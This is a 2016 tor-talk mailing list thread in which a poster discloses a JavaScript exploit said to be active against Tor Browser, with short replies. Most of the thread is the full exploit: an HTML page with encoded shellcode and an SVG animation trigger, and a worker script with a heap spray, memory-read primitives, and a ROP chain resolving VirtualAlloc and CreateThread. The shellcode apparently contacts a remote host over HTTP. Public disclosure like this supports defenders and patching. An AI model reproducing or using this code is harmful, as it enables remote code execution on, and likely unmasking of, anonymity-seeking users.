[tor-talk] Javascript exploit
Kristov Atlas
kristovatlas.lists at gmail.com
Wed Nov 30 05:03:15 UTC 2016
For anyone looking into it, I tried to clean up cssbanner.js a little more.
https://gist.github.com/kristovatlas/e03be5f10e48801aec88b0e23f00a3d7
I didn't actually compare execution before and after my changes, so caveat
emptor.
On Tue, Nov 29, 2016 at 6:31 PM, Kevin <kevinsisco61784 at gmail.com> wrote:
> The first var looks like an encryption key. Just my humble observation
> and food for thought.
>
>
>
>
> On 11/29/2016 4:55 PM, firstwatch at sigaint.org wrote:
>
>> This is an Javascript exploit actively used against TorBrowser NOW. It
>> consists of one HTML and one CSS file, both pasted below and also
>> de-obscured. The exact functionality is unknown but it's getting access to
>> "VirtualAlloc" in "kernel32.dll" and goes from there. Please fix ASAP. I
>> had to break the "thecode" line in two in order to post, remove ' + ' in
>> the middle to restore it.
>>
>> HTML:
>>
>> <html>
>> <head>
>> <script>
>>
>> var thecode
>> ='\ue8fc\u0089\u0000\u8960\u31e5\u64d2\u528b\u8b30\u0c52\u52
>> 8b\u8b14\u2872\ub70f\u264a\uff31\uc031\u3cac\u7c61\u2c02\uc1
>> 20\u0dcf\uc701\uf0e2\u5752\u528b\u8b10\u3c42\ud001\u408b\u85
>> 78\u74c0\u014a\u50d0\u488b\u8b18\u2058\ud301\u3ce3\u8b49\u8b
>> 34\ud601\uff31\uc031\uc1ac\u0dcf\uc701\ue038\uf475\u7d03\u3b
>> f8\u247d\ue275\u8b58\u2458\ud301\u8b66\u4b0c\u588b\u011c\u8b
>> d3\u8b04\ud001\u4489\u2424\u5b5b\u5961\u515a\ue0ff\u5f58\u8b
>> 5a\ueb12\u5d86\u858d\u0297\u0000\u6850\u774c\u0726\ud5ff\uc0
>> 85\u840f\u0185\u0000\u858d\u029e\u0000\u6850\u774c\u0726\ud5
>> ff\uc085\u840f\u016f\u0000\u90bb\u0001\u2900\u54dc\u6853\u80
>> 29\u006b\ud5ff\udc01\uc085\u850f\u0155\u0000\u5050\u5050\u50
>> 40\u5040\uea68\udf0f\uffe0\u31d5\uf7db\u39d3\u0fc3\u3a84\u00
>> 01\u8900\u68c3\u2705\ue21b\u6866\u5000\uc931\uc180\u6602\u89
>> 51\u6ae2\u5210\u6853\ua599\u6174\ud5ff\uc085\u0874\u8dfe\u02
>> 48\u0000\ud775\u00b8\u0001\u2900\u89c4\u52e2\u5250\ub668\ude
>> 49\uff01\u5fd5\uc481\u0100\u0000\uc085\u850f\u00f6\u0000\ue8
>> 57\u00fa\u0000\u895e\u8dca\ua7bd\u0002
>> \ue800\u00ec\u0000\u834f\u20fa\u057c\u20ba\u0000\u8900\u56d1
>> \ua4f3\u0db9\u0000\u8d00\u8ab5\u0002\uf300\u89a4\u44bd\u0002
>> \u5e00\u6856\u28a9\u8034\ud5ff\uc085\u840f'
>> +
>> '\u00ae\u0000\u8b66\u0a48\u8366\u04f9\u820f\u00a0\u0000\u408
>> d\u8b0c\u8b00\u8b08\ub809\u0100\u0000\u8950\u29e7\u89c4\u57e
>> 6\u5156\u6851\u7248\ub8d2\ud5ff\uc085\uc481\u0104\u0000\ub70
>> f\u830f\u06f9\u7072\u06b9\u0000\ub800\u0010\u0000\uc429\ue78
>> 9\uca89\ue2d1\u5250\ud231\u168a\ud088\uf024\ue8c0\u3c04\u770
>> 9\u0404\ueb30\u0402\u8837\u4707\ud088\u0f24\u093c\u0477\u300
>> 4\u02eb\u3704\u0788\u4647\ud4e2\u2959\u89cf\u58fe\uc401\ubd8
>> b\u0244\u0000\ua4f3\u36e8\u0000\u3100\u50c0\u2951\u4fcf\u535
>> 7\uc268\u38eb\uff5f\uebd5\u6a09\u6800\u1347\u6f72\ud5ff\u685
>> 3\u6e75\u614d\ud5ff\uedeb\uc931\ud1f7\uc031\uaef2\ud1f7\uc34
>> 9\u0000\u0000\u8d03\ua7bd\u0002\ue800\uffe4\uffff\ub94f\u004
>> f\u0000\ub58d\u026e\u0000\ua4f3\ubd8d\u02a7\u0000\ucbe8\ufff
>> f\uc3ff\u0a0d\u6341\u6563\u7470\u452d\u636e\u646f\u6e69\u3a6
>> 7\u6720\u697a\u0d70\u0d0a\u000a\u0a0d\u6f43\u6b6f\u6569\u203
>> a\u434d\u773d\u3273\u335f\u0032\u5049\u4c48\u4150\u4950\u470
>> 0\u5445\u2f20\u6130\u3238\u6131\u3038\u302f\u6435\u3063\u313
>> 2\u2032\u5448\u5054\u312f\u312e\u0a0d\
>> u6f48\u7473\u203a\u0000\u0000\u0000\u0000\u0000\u0000\u0000\
>> u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\
>> u0000\u0000\u4190';
>>
>>
>> var worker = new Worker('cssbanner.js');
>>
>> worker.postMessage(thecode);
>>
>> var svgns = 'http://www.w3.org/2000/svg';
>> var heap80 = new Array(0x1000);
>> var heap100 = new Array(0x4000);
>> var block80 = new ArrayBuffer(0x80);
>> var block100 = new ArrayBuffer(0x100);
>> var sprayBase = undefined;
>> var arrBase = undefined;
>>
>> var animateX = undefined;
>> var containerA = undefined;
>>
>> var offset = 0x90;
>> if
>> (/.*Firefox\/(4[7-9]|[5-9]\d+|[1-9]\d{2,})\..*/.test(navigat
>> or.userAgent))
>> {
>> offset = 0x88; // versions 47.0 or greater
>> }
>>
>> var $ = function(id) { return document.getElementById(id); }
>>
>> var exploit = function()
>> {
>> var u32 = new Uint32Array(block80)
>> u32[0x2] = arrBase - offset;
>> u32[0x8] = arrBase - offset;
>> u32[0xE] = arrBase - offset;
>>
>>
>> for(i = heap100.length/2; i < heap100.length; i++)
>> {
>> heap100[i] = block100.slice(0)
>> }
>>
>> for(i = 0; i < heap80.length/2; i++)
>> {
>> heap80[i] = block80.slice(0)
>> }
>>
>> animateX.setAttribute('begin', '59s')
>> animateX.setAttribute('begin', '58s')
>>
>> for(i = heap80.length/2; i < heap80.length; i++)
>> {
>> heap80[i] = block80.slice(0)
>> }
>>
>> for(i = heap100.length/2; i < heap100.length; i++)
>> {
>> heap100[i] = block100.slice(0)
>> }
>>
>> animateX.setAttribute('begin', '10s')
>> animateX.setAttribute('begin', '9s')
>> window.dump('PAUSING!!! YAYA');
>> containerA.pauseAnimations();
>> }
>>
>> worker.onmessage = function(e)
>> {
>> worker.onmessage = function(e)
>> {
>> window.setTimeout(function()
>> {
>> worker.terminate();
>>
>> document.body.innerHTML = '';
>> document.getElementsByTagName('head')[0].innerHTML = '';
>> document.body.setAttribute('onload', '')
>> }, 1000);
>> }
>>
>> arrBase = e.data;
>> exploit();
>> }
>>
>>
>> var idGenerator = function()
>> {
>> return 'id' +
>> (((1+Math.random())*0x10000)|0).toString(16).substring(1);
>> }
>>
>>
>> var craftDOM = function()
>> {
>> containerA = document.createElementNS(svgns, 'svg')
>> var containerB = document.createElementNS(svgns, 'svg');
>>
>> animateX = document.createElementNS(svgns, 'animate')
>> var animateA = document.createElementNS(svgns, 'animate')
>> var animateB = document.createElementNS(svgns, 'animate')
>>
>> var animateC = document.createElementNS(svgns, 'animate')
>>
>> var idX = idGenerator();
>> var idA = idGenerator();
>> var idB = idGenerator();
>> var idC = idGenerator();
>>
>> animateX.setAttribute('id', idX);
>> animateA.setAttribute('id', idA);
>> animateA.setAttribute('end', '50s');
>> animateB.setAttribute('id', idB);
>> animateB.setAttribute('begin', '60s');
>> animateB.setAttribute('end', idC + '.end');
>> animateC.setAttribute('id', idC);
>> animateC.setAttribute('begin', '10s');
>> animateC.setAttribute('end', idA + '.end');
>>
>> containerA.appendChild(animateX)
>> containerA.appendChild(animateA)
>> containerA.appendChild(animateB)
>>
>> containerB.appendChild(animateC)
>>
>> document.body.appendChild(containerA);
>> document.body.appendChild(containerB);
>> }
>> window.onload = craftDOM;
>> //
>> </script>
>>
>> <style>
>> #mtdiv{
>> position: absolute;
>> width: 960px;
>> height: 166px;
>> z-index: 15;
>> top: 100px;
>> left: 50%;
>> margin: 0 0 0 -480px;
>> }
>> </style>
>> </head>
>> <body bgcolor='#2F3236'>
>>
>> <div id='mtdiv'>
>> <img src='mt.png'/>
>> </div>
>> </body>
>> <script>
>> setTimeout('window.location = \'member.php\';', 2000);
>> </script>
>>
>> </html>
>>
>> ============================================================
>> =======================================
>>
>> content of "cssbanner.js":
>>
>> self.onmessage = function(msg) {
>>
>> thecode = msg.data;
>> var pack = function (b) { var a = b >> 16; return String.fromCharCode(b
>> & 65535) + String.fromCharCode(a) };
>> function
>> Memory(b,a,f){this._base_addr=b;this._read=a;this._write=f;t
>> his._abs_read=function(a){a>=this._base_addr?a=this._read(a-
>> this._base_addr):(a=4294967295-this._base_addr+1+a,a=this._
>> read(a));return
>> 0>a?4294967295+a+1:a};this._abs_write=function(a,b){a>=this.
>> _base_addr?this._write(a-this._base_addr,b):(a=4294967295-
>> this._base_addr+1+a,this._write(a,b))};this.readByte=function(a){return
>> this.read(a)&255};this.readWord=function(a){return
>> this.read(a)&65535};this.readDword=function(a){return this.read(a)};
>> this.read=function(a,b){if(a%4){var
>> c=this._abs_read(a&4294967292),d=this._abs_read(a+4&42949672
>> 92),e=a%4;return
>> c>>>8*e|d<<8*(4-e)}return
>> this._abs_read(a)};this.readStr=function(a){for(var
>> b="",c=0;;){if(32==c)return"";var
>> d=this.readByte(a+c);if(0==d)break;b+=String.fromCharCode(d);c++}return
>> b};this.write=function(a){}}
>> function PE(b,a){this.mem=b;this.export_table=this.module_base=void
>> 0;this.export_table_size=0;this.import_table=void
>> 0;this.import_table_size=0;this.find_module_base=function(a)
>> {for(a&=4294901760;a;){if(23117==this.mem.readWord(a))return
>> this.module_base=a;a-=65536}};this._resolve_pe_structures=fu
>> nction(){peFile=this.module_base+this.mem.readWord(this.modu
>> le_base+60);if(17744!=this.mem.readDword(peFile))throw"Bad
>> NT
>> Signature";this.pe_file=peFile;this.optional_header=this.pe_
>> file+36;this.export_directory=
>> this.module_base+this.mem.readDword(this.pe_file+120);this.
>> export_directory_size=this.mem.readDword(this.pe_file+
>> 124);this.import_directory=this.module_base+this.mem.
>> readDword(this.pe_file+128);this.import_directory_size=
>> this.mem.readDword(this.pe_file+132)};this.resolve_
>> imported_function=function(a,b){void
>> 0==this.import_directory&&this._resolve_pe_structures();for(var
>> e=this.import_directory,c=e+this.import_directory_size;e<c;){var
>> d=this.mem.readStr(this.mem.readDword(e+12)+this.module_base
>> );if(a.toUpperCase()==
>> d.toUpperCase()){for(var
>> c=this.mem.readDword(e)+this.module_base,e=this.mem.readDwor
>> d(e+16)+this.module_base,d=this.mem.readDword(c),f=0;0!=
>> d;){if(this.mem.readStr(d+this.module_base+2).toUpperCas
>> e()==b.toUpperCase())return
>> this.mem.readDword(e+4*f);f++;d=this.mem.readDword(c+4*f)}br
>> eak}e+=20}return
>> 0};void 0!=a&&this.find_module_base(a)}
>> function ROP(b,a){this.mem=b;this.pe=new
>> PE(b,a);this.pe._resolve_pe_structures();this.module_base=th
>> is.pe.module_base+4096;this.findSequence=function(a){for(var
>> b=0;;){for(var
>> e=0,c=0;c<a.length;c++)if(this.mem.readByte(this.module_base
>> +b+c)==a[c]&&e==c)e++;else
>> break;if(e==a.length)return
>> this.module_base+b;b++}};this.findStackPivot=function(){return
>> this.findSequence([148,195])};this.findPopRet=function(a){return
>> this.findSequence([88,195])};this.ropChain=function(a,b,e,c){c=void
>> 0!=c?c:new ArrayBuffer(4096);
>> c=new Uint32Array(c);var
>> d=this.findStackPivot(),f=this.findPopRet("EAX"),g=this.pe.
>> resolve_imported_function("kernel32.dll","VirtualAlloc");c[
>> 0]=f+1;c[1]=f;c[2]=a+b+4*e+4;c[3]=d;for(i=0;i<e;i++)c[(b>>
>> 2)+i]=d;d=(b+4>>2)+e;c[d++]=g;c[d++]=a+(b+4*e+28);c[d++]=a;
>> c[d++]=4096;c[d++]=4096;c[d++]=64;c[d++]=3435973836 <(343)%20597-3836>
>> ;return
>> c}}
>> var conv=new ArrayBuffer(8),convf64=new Float64Array(conv),convu32=new
>> Uint32Array(conv),qword2Double=function(b,a){convu32[0]=b;
>> convu32[1]=a;return
>> convf64[0]},doubleFromFloat=function(b,a){convf64[0]=b;return
>> convu32[a]},sprayArrays=function(){for(var
>> b=Array(262138),a=0;262138>a;a++)b[a]=fzero;for(a=0;a<b.leng
>> th;a+=512)b[a+1]=memory,b[a+21]=qword2Double(0,2),b[a+14]=
>> qword2Double(arrBase+o1,0),b[a+(o1+8)/8]=qword2Double(arrBa
>> se+o2,0),b[a+(o2+0)/8]=qword2Double(2,0),b[a+(o2+8)/8]=
>> qword2Double(arrBase+
>> o3,arrBase+13),b[a+(o3+0)/8]=qword2Double(16,0),b[a+(o3+24)
>> /8]=qword2Double(2,0),b[a+(o3+32)/8]=qword2Double(arrBase+o5
>> ,arrBase+o4),b[a+(o4+0)/8]=qword2Double(0,arrBase+o6),b[a+(
>> o5+0)/8]=qword2Double(arrBase+o7,0),b[a+(o6+8)/8]=qword2Doub
>> le(2,0),b[a+(o7+8)/8]=qword2Double(arrBase+o7+16,0),
>> b[a+(o7+16)/8]=qword2Double(0,4026531840 <(402)%20653-1840>
>> ),b[a+(o7+32)/8]=qword2Double(0,3220176896),b[
>> a+(o7+48)/8]=qword2Double(2,0),b[a+(o7+56)/8]=qword2Double(
>> 1,0),b[a+(o7+96)/8]=qword2Double(arrBase+o8,arrBase+o8),b[a+(o7+112)/
>> 8]=qword2Double(arrBase+o9,arrBase+o9+16),b[a+(o7+168)/8]=
>> qword2Double(0,2),b[a+(o9+0)/8]=qword2Double(arrBase+o10,2),
>> b[a+(o10+0)/8]=qword2Double(2,0),b[a+(o10+8)/8]=qword2Double
>> (0,268435456),b[a+(o11+8)/8]=qword2Double(arrBase+o11+16,0)
>> ,b[a+(o11+16)/8]=qword2Double(0,4026531840 <(402)%20653-1840>
>> ),b[a+(o11+32)/8]=qword2Double(0,3220176896),b[
>> a+(o11+48)/8]=qword2Double(2,0),b[a+(o11+56)/8]=
>> qword2Double(1,0),b[a+(o11+96)/8]=qword2Double(arrBase+o8,
>> arrBase+o8),b[a+(o11+112)/8]=qword2Double(arrBase+o9,arrBase+o9+16),b[a+
>> (o11+168)/8]=qword2Double(0,2);for(a=0;a<spr.length;a++)
>> spr[a]=b.slice(0)},vtable_offset=300;/.*Firefox\/(41\.0(
>> \.[1-2]|)|42\.0).*/.test(navigator.userAgent)?vtable_
>> offset=304:/.*Firefox\/(4[3-9]|[5-9]\d+|[1-9]\d{2,})\..*/.
>> test(navigator.userAgent)&&(vtable_offset=308);
>> var spr=Array(400),arrBase=805306416,ropArrBuf=new
>> ArrayBuffer(4096),o1=176,o2=256,o3=768,o4=832,o5=864,o6=928,
>> o7=1024,o8=1280,o9=1344,o10=1376,o11=1536,oRop=1792,memory=new
>> Uint32Array(16),len=memory.length,arr_index=0,arr_offset=0;
>> fzero=qword2Double(0,0);0!=thecode.length%2&&(thecode+="\u90
>> 90");sprayArrays();postMessage(arrBase);
>> for(memarrayloc=void 0;void
>> 0==memarrayloc;)for(i=0;i<spr.length;i++)for(offset=0;offset
>> <spr[i].length;offset+=512)if("object"!=typeof
>> spr[i][offset+1]){memarrayloc=doubleFromFloat(spr[i][offset+
>> 1],0);arr_index=i;arr_offset=offset;spr[i][offset+(o2+0)/8]=
>> qword2Double(65,0);spr[i][offset+(o2+8)/8]=qword2Double(arrB
>> ase+o3,memarrayloc+27);for(j=0;33>j;j++)spr[i][offset+(o2+
>> 16)/8+j]=qword2Double(memarrayloc+27,memarrayloc+27)
>> ;spr[i][offset+(o3+8)/8]=qword2Double(0,0);spr[i][
>> offset+(o5+0)/8]=qword2Double(arrBase+
>> o11,0);spr[i][offset+(o7+168)/8]=qword2Double(0,3);spr[i][o
>> ffset+(o7+88)/8]=qword2Double(0,2);break}for(;memory.length==len;);var
>> mem=new Memory(memarrayloc+48,function(b){return
>> memory[b/4]},function(b,a){memory[b/4]=a}),xulPtr=mem.readDw
>> ord(memarrayloc+12);spr[arr_index][arr_offset+1]=ropArrBuf
>> ;ropPtr=mem.readDword(arrBase+8);spr[arr_index][arr_offset+
>> 1]=null;ropBase=mem.readDword(ropPtr+16);var
>> rop=new
>> ROP(mem,xulPtr);rop.ropChain(ropBase,vtable_offset,10,ropArrBuf);
>> var backupESP=rop.findSequence([137,1,195]),ropChain=new
>> Uint32Array(ropArrBuf);ropChain[0]=backupESP;CreateThread=
>> rop.pe.resolve_imported_function("KERNEL32.dll","CreateThread");for(var
>> i=0;i<ropChain.length&&3435973836!=ropChain[i];i++);
>> ropChain[i++]=3296825488;ropChain[i++]=2048;ropChain[i+
>> +]=1347469361;ropChain[i++]=1528949584;ropChain[i++]=3092271187
>> ;ropChain[i++]=CreateThread;ropChain[i++]=3096498431;ro
>> pChain[i++]=arrBase+16;ropChain[i++]=1955274891;ropChain[i++
>> ]=280697892;ropChain[i++]=704643071;
>> ropChain[i++]=2425406428;ropChain[i++]=4294957800;ropChain[
>> i++]=2425393407;for(var
>> j=0;j<thecode.length;j+=2)ropChain[i++]=thecode.charCodeAt(
>> j)+65536*thecode.charCodeAt(j+1);spr[arr_index][arr_offset]=
>> qword2Double(arrBase+16,0);spr[arr_index][arr_offset+3]=
>> qword2Double(0,256);spr[arr_index][arr_offset+2]=
>> qword2Double(ropBase,0);spr[arr_index][arr_offset+(o11+
>> 168)/8]=qword2Double(0,3);spr[arr_index][arr_offset+(o11+88)
>> /8]=qword2Double(0,2);postMessage("GREAT
>> SUCCESS");
>>
>> };
>>
>>
>> Beautified:
>>
>> self.onmessage =
>> function(msg) {
>>
>> thecode = msg.data;
>> var pack = function (b) { var a = b >> 16; return String.fromCharCode(b
>> & 65535) + String.fromCharCode(a) };
>>
>> function Memory(b,a,f)
>> {
>> this._base_addr=b;
>> this._read=a;
>> this._write=f;
>> this._abs_read = function(a) {
>> a >= this._base_addr ? a = this._read( a - this._base_addr) : (
>> a = 4294967295 - this._base_addr + 1 + a, a = this._read(a) );
>> return 0>a?4294967295+a+1:a
>>
>> };
>> this._abs_write = function(a,b) {
>> a >= this._base_addr ? this._write(a - this._base_addr, b) : (
>> a
>> = 4294967295 - this._base_addr + 1 + a, this._write(a,b) )
>> };
>> this.readByte = function(a) {
>> return this.read(a) & 255
>>
>> };
>> this.readWord = function(a) {
>> return this.read(a) & 65535
>> };
>> this.readDword = function(a){ return this.read(a) };
>> this.read = function(a,b) {
>> if (a%4) {
>> var c = this._abs_read( a & 4294967292),
>> d = this._abs_read( a+4 & 4294967292),
>> e = a%4;
>> return c>>>8*e | d<<8*(4-e)
>> }
>> return this._abs_read(a)
>> };
>> this.readStr = function(a) {
>> for(var b = "", c = 0;;) {
>> if (32 == c)
>> return "";
>> var d = this.readByte(a+c);
>> if(0 == d)
>> break;
>> b += String.fromCharCode(d);
>> c++
>> }
>> return b
>>
>> };
>> this.write = function(a){}
>> }
>> function PE(b,a) {
>> this.mem = b;
>> this.export_table = this.module_base = void 0;
>> this.export_table_size = 0;
>> this.import_table = void 0;
>> this.import_table_size = 0;
>> this.find_module_base = function(a) {
>> for(a &= 4294901760; a; ) {
>> if(23117 == this.mem.readWord(a))
>> return this.module_base=a;
>> a -= 65536
>> }
>> };
>> this._resolve_pe_structures = function() {
>> peFile = this.module_base + this.mem.readWord(this.module_
>> base+60);
>> if(17744 != this.mem.readDword(peFile))
>> throw"Bad NT Signature";
>> this.pe_file = peFile;
>> this.optional_header = this.pe_file+36;
>> this.export_directory =
>> this.module_base+this.mem.readDword(this.pe_file+120);
>> this.export_directory_size = this.mem.readDword(this.pe_fil
>> e+124);
>> this.import_directory=this.module_base+this.mem.readDword(
>> this.pe_file+128);
>> this.import_directory_size=this.mem.readDword(this.pe_file+
>> 132)};
>> this.resolve_imported_function=function(a,b){
>> void 0==this.import_directory&&this
>> ._resolve_pe_structures();
>> for(var
>> e=this.import_directory,c=e+this.import_directory_size;e<c;){
>> var
>> d=this.mem.readStr(this.mem.readDword(e+12)+this.module_base);
>> if(a.toUpperCase()==d.toUpperCase()){
>> for(var c = this.mem.readDword(e) +
>> this.module_base,
>> e = this.mem.readDword(e+16) +
>> this.module_base,
>> d = this.mem.readDword(c),
>> f = 0 ; 0 !=d ;)
>> {
>> if(this.mem.readStr(d+this.mo
>> dule_base+2).toUpperCase()
>> == b.toUpperCase())
>> return this.mem.readDword(e+4*f);
>> f++;
>> d = this.mem.readDword(c+4*f)
>> }
>> break
>> }
>> e+=20
>> }
>> return 0
>> };
>> void 0!=a && this.find_module_base(a)
>> }
>> function ROP(b,a){
>> this.mem = b;
>> this.pe = new PE(b,a);
>> this.pe._resolve_pe_structures();
>> this.module_base = this.pe.module_base+4096;
>> this.findSequence = function(a) {
>> for(var b=0;;) {
>> for(var e=0,c=0;c<a.length;c++)
>> if(this.mem.readByte(this.mod
>> ule_base+b+c)==a[c]&&e==c)
>> e++;
>> else
>> break;
>> if(e==a.length)
>> return this.module_base+b;
>> b++
>>
>> }
>>
>> };
>> this.findStackPivot=function() {
>> return this.findSequence([148,195])
>>
>> };
>> this.findPopRet=function(a) {
>> return this.findSequence([88,195])
>>
>> };
>> this.ropChain=function(a,b,e,c) {
>> c = void 0 != c ? c : new ArrayBuffer(4096);
>> c = new Uint32Array(c);
>> var d = this.findStackPivot(),
>> f = this.findPopRet("EAX"),
>> g =
>> this.pe.resolve_imported_function("kernel32.dll","VirtualAlloc");
>> c[0]= f+1;
>> c[1]= f;
>> c[2]= a+b+4*e+4;
>> c[3]= d;
>> for(i=0;i<e;i++)
>> c[(b>>2)+i] = d;
>> d =(b+4>>2)+e;
>> c[d++]=g;
>> c[d++]=a+(b+4*e+28);
>> c[d++]=a;
>> c[d++]=4096;
>> c[d++]=4096;
>> c[d++]=64;
>> c[d++]=3435973836;
>> return c
>> }
>> }
>> var conv=new ArrayBuffer(8),
>> convf64=new Float64Array(conv),
>> convu32=new Uint32Array(conv),
>> qword2Double=function(b,a) {
>> convu32[0]=b;
>> convu32[1]=a;
>> return convf64[0]
>> },
>> doubleFromFloat = function(b,a) {
>> convf64[0]=b;
>> return convu32[a]
>>
>> },
>> sprayArrays=function() {
>> for(var b=Array(262138),a=0;262138>a;a++)
>> b[a]=fzero;
>> for(a=0;a<b.length;a+=512)
>> b[a+1] = memory,
>> b[a+21] = qword2Double(0,2),
>> b[a+14] = qword2Double(arrBase+o1,0),
>> b[a+(o1+8)/8] = qword2Double(arrBase+o2,0),
>> b[a+(o2+0)/8] = qword2Double(2,0),
>> b[a+(o2+8)/8] = qword2Double(arrBase+o3,arrBase+13),
>> b[a+(o3+0)/8] = qword2Double(16,0),
>> b[a+(o3+24)/8] = qword2Double(2,0),
>> b[a+(o3+32)/8] = qword2Double(arrBase+o5,arrBase+o4),
>> b[a+(o4+0)/8] = qword2Double(0,arrBase+o6),
>> b[a+(o5+0)/8] = qword2Double(arrBase+o7,0),
>> b[a+(o6+8)/8] = qword2Double(2,0),
>> b[a+(o7+8)/8] = qword2Double(arrBase+o7+16,0),
>> b[a+(o7+16)/8] = qword2Double(0,4026531840),
>> b[a+(o7+32)/8] = qword2Double(0,3220176896),
>> b[a+(o7+48)/8] = qword2Double(2,0),
>> b[a+(o7+56)/8] = qword2Double(1,0),
>> b[a+(o7+96)/8] = qword2Double(arrBase+o8,arrBase+o8),
>> b[a+(o7+112)/8] = qword2Double(arrBase+o9,arrBase+o9+16),
>> b[a+(o7+168)/8] = qword2Double(0,2),
>> b[a+(o9+0)/8] = qword2Double(arrBase+o10,2),
>> b[a+(o10+0)/8] = qword2Double(2,0),
>> b[a+(o10+8)/8] = qword2Double(0,268435456),
>> b[a+(o11+8)/8] = qword2Double(arrBase+o11+16,0),
>> b[a+(o11+16)/8] = qword2Double(0,4026531840),
>> b[a+(o11+32)/8] = qword2Double(0,3220176896),
>> b[a+(o11+48)/8] = qword2Double(2,0),
>> b[a+(o11+56)/8] = qword2Double(1,0),
>> b[a+(o11+96)/8] = qword2Double(arrBase+o8,arrBase+o8),
>> b[a+(o11+112)/8] = qword2Double(arrBase+o9,arrBase+o9+16),
>> b[a+(o11+168)/8] = qword2Double(0,2);
>> for(a=0;a<spr.length;a++)
>> spr[a]=b.slice(0)
>> }, vtable_offset=300;
>> /.*Firefox\/(41\.0(\.[1-2]|)|42\.0).*/.test(navigator.userAgent)?
>> vtable_offset=304 :
>> /.*Firefox\/(4[3-9]|[5-9]\d+|[1-9]\d{2,})\..*/.test(navigat
>> or.userAgent)
>> && (vtable_offset=308);
>> var spr=Array(400),
>> arrBase=805306416,
>> ropArrBuf=new ArrayBuffer(4096),
>> o1=176,
>> o2=256,
>> o3=768,
>> o4=832,
>> o5=864,
>> o6=928,
>> o7=1024,
>> o8=1280,
>> o9=1344,
>> o10=1376,
>> o11=1536,
>> oRop=1792,
>> memory=new Uint32Array(16),
>> len=memory.length,
>> arr_index=0,
>> arr_offset=0;
>> fzero=qword2Double(0,0);
>> 0!=thecode.length%2&&(thecode+="\u9090");
>> sprayArrays();
>> postMessage(arrBase);
>> for(memarrayloc=void 0;void 0==memarrayloc;)
>> for(i=0;i<spr.length;i++)
>> for(offset=0;offset<spr[i].length;offset+=512)
>> if("object" != typeof spr[i][offset+1]) {
>> memarrayloc=doubleFromFloat(spr[i][offset+1],0);
>> arr_index=i;
>> arr_offset=offset;
>> spr[i][offset+(o2+0)/8]=qword2Double(65,0);
>> spr[i][offset+(o2+8)/8]=qword2
>> Double(arrBase+o3,memarrayloc+27);
>> for(j=0;33>j;j++)
>> spr[i][offset+(o2+16)/8+j]=qwo
>> rd2Double(memarrayloc+27,memarrayloc+27);
>> spr[i][offset+(o3+8)/8]=qword2Double(0,0);
>> spr[i][offset+(o5+0)/8]=qword2
>> Double(arrBase+o11,0);
>> spr[i][offset+(o7+168)/8]=qword2Double(0,3);
>> spr[i][offset+(o7+88)/8]=qword2Double(0,2);
>> break
>> }
>> for(;memory.length==len;);
>> var mem=new Memory(memarrayloc+48,
>> function(b){return memory[b/4]},
>> function(b,a){memory[b/4]=a}),
>> xulPtr=mem.readDword(memarrayloc+12);
>> spr[arr_index][arr_offset+1]=ropArrBuf;
>> ropPtr=mem.readDword(arrBase+8);
>> spr[arr_index][arr_offset+1]=null;
>> ropBase=mem.readDword(ropPtr+16);
>> var rop=new ROP(mem,xulPtr);
>> rop.ropChain(ropBase,vtable_offset,10,ropArrBuf);
>> var backupESP=rop.findSequence([137,1,195]), ropChain=new
>> Uint32Array(ropArrBuf);
>> ropChain[0]=backupESP;
>> CreateThread=rop.pe.resolve_imported_function("KERNEL32.dll
>> ","CreateThread");
>> for(var i=0;i<ropChain.length&&3435973836!=ropChain[i];i++);
>> ropChain[i++]=3296825488;
>> ropChain[i++]=2048;
>> ropChain[i++]=1347469361;
>> ropChain[i++]=1528949584;
>> ropChain[i++]=3092271187;
>> ropChain[i++]=CreateThread;
>> ropChain[i++]=3096498431;
>> ropChain[i++]=arrBase+16;
>> ropChain[i++]=1955274891;
>> ropChain[i++]=280697892;
>> ropChain[i++]=704643071;
>> ropChain[i++]=2425406428;
>> ropChain[i++]=4294957800;
>> ropChain[i++]=2425393407;
>> for (var j=0;j<thecode.length;j+=2)
>> ropChain[i++]=thecode.charCodeAt(j)+65536*thecode.charCodeA
>> t(j+1);
>> spr[arr_index][arr_offset]=qword2Double(arrBase+16,0);
>> spr[arr_index][arr_offset+3]=qword2Double(0,256);
>> spr[arr_index][arr_offset+2]=qword2Double(ropBase,0);
>> spr[arr_index][arr_offset+(o11+168)/8]=qword2Double(0,3);
>> spr[arr_index][arr_offset+(o11+88)/8]=qword2Double(0,2);
>> postMessage("GREAT SUCCESS");
>> };
>>
>>
>>
>>
>
>
> ---
> This email has been checked for viruses by Avast antivirus software.
> https://www.avast.com/antivirus
>
>
> --
> tor-talk mailing list - tor-talk at lists.torproject.org
> To unsubscribe or change other settings go to
> https://lists.torproject.org/cgi-bin/mailman/listinfo/tor-talk
>
More information about the tor-talk
mailing list